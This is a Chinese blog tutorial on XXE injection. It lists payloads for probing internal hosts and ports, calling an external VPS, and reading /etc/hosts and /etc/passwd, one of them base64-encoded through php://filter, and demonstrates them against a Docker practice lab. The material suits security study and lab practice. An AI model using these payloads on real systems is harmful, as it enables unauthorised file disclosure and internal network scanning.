温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

利用xxe获取linux系统的passwd

发布时间:2020-02-28 11:06:15 来源:网络 阅读:606 作者:hack_man 栏目:安全技术

引用外部DTD文件访问内网主机/端口。

<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看响应时间)

引用外部DTD文件访问wai网。

<!DOCTYPE a SYSTEM "http://vps_ip" >

引用内部实体。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部实体读本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部实体访问内wang主机端口。

<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看响应时间)

外部实体访问wai网。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>

docker中下载rrodrigo/xxelab该镜像

启动:docker run -d -p 8082:80 rrodrigo/xxelab

利用xxe获取linux系统的passwd

抓取注册包,发现采用xml格式传递,且邮箱有返回:

利用xxe获取linux系统的passwd

将返回内容处进行xxe回显设置读取/etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>

利用xxe获取linux系统的passwd

利用base64编码进行xxe,防止有返回包验证

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>

利用xxe获取linux系统的passwd
返回base64数据包,base64解码

利用xxe获取linux系统的passwd

向AI问一下细节
推荐阅读:
  1. passwd命令
  2. xxe hacking

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI